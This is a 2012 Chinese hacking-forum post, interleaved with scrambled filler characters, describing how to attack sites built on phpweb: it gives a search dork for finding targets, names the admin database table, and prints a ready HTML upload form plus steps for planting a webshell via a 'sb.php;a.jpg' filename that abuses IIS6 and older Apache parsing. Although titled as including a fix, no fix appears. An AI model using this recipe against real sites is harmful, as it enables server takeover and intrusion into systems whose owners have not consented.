中国网络渗透测试联盟
标题:
phpweb成品网站全版本通杀注入漏洞及修复
[打印本页]
作者:
admin
时间:
2012-11-9 20:52
标题:
phpweb成品网站全版本通杀注入漏洞及修复
关键字:inurl:webmall/detail.php?id
! n2 j8 N' m* e! b
* @* X2 t% w9 e! ~- M" q+ b
数据表:pwn_base_admin
8 l+ @" Q0 h2 \! H/ }1 u# D2 i
- L" ~9 r+ e: L9 T3 j
关于拿shell
+ f8 f9 y- x. z
+ t" t( c7 y, {: [* l8 `6 S
首先登录后台admin.php
+ a5 b: v! e6 w8 v4 Q& a+ I
' U3 G5 g1 z9 B+ c) i, ?) X2 p* j
看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。
/ @$ N; ?8 Q+ f* Y7 C" Y
换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg
) z) O6 P2 Y) j8 t# \1 l5 y
然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的
5 W" h2 \7 B0 q- f: Q3 F5 P
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">
' v/ I @0 n8 `* G: R
<input type="text" name="fileName" value="sb.php;a.jpg" />
' V3 j/ h% I1 E( w( S3 N5 v4 c
<input type="hidden" name="attachPath" value="news/pics/" />
4 x6 m: m# }" A( }: K5 k( Y/ N
<input type="file" name="fileData" size="14" /></td>
% W# X4 V7 C e/ F" n
<input type="submit" name="button" value="确定" />
# z8 g. f5 r6 l, R, C& d- W
</form>
2 P; a8 |' r+ d( [7 t/ n
% m8 V( ^1 J& f) G
首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。
' w0 C: S9 i% b
% K. T( `; t' A3 U
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2